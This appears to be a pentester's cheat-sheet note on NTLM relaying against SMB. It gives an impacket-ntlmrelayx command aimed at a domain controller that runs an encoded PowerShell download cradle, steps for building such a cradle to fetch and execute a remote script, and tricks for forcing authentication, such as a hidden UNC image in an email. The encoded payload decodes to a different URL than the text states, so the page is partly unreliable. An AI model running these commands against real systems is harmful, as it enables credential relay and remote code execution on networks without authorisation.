NTLM Relaying

Intercept / capture authentication traffic and impersonate client against same or diff service

Net-NTLM relaying against SMB is only possible if SMB signing is not enabled

Start ntlmrelayx listener

sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.120.6 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC kALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAu ADEAMQA4AC4AOQA6ADgAMQAvAHIAdQBuAC4AcABzADEAJwApACAAfAAgAEkARQBYAA=='

192.168.120.6 is the IP address of dc-2.dev.cyberbotic.io (target).

The encoded command is a download cradle for "http://192.168.119.120/run.txt" and /run.txt is a Powershell runner -> PowerShell Runners.

Create the encoded command

Using pwsh on Kali:

sudo apt -y install powershell
pwsh
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText

Grab NetNTLMv2

To make ntlmrelayx output the caught NetNTLMv2 using the following flag

--output-file testrelay.txt

Keep in mind NetNTLMv2 cant be used for pth, only relaying (or cracked)

Forcing NTLM auth

MSSQL -> UNC Path Injection
Printspooler
Email with 1x1 in body

<img src="\\10.10.123.102\test.ico" height="1" width="1" />

Windows Shortcut

Tooling

https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py

Last updated 2 years ago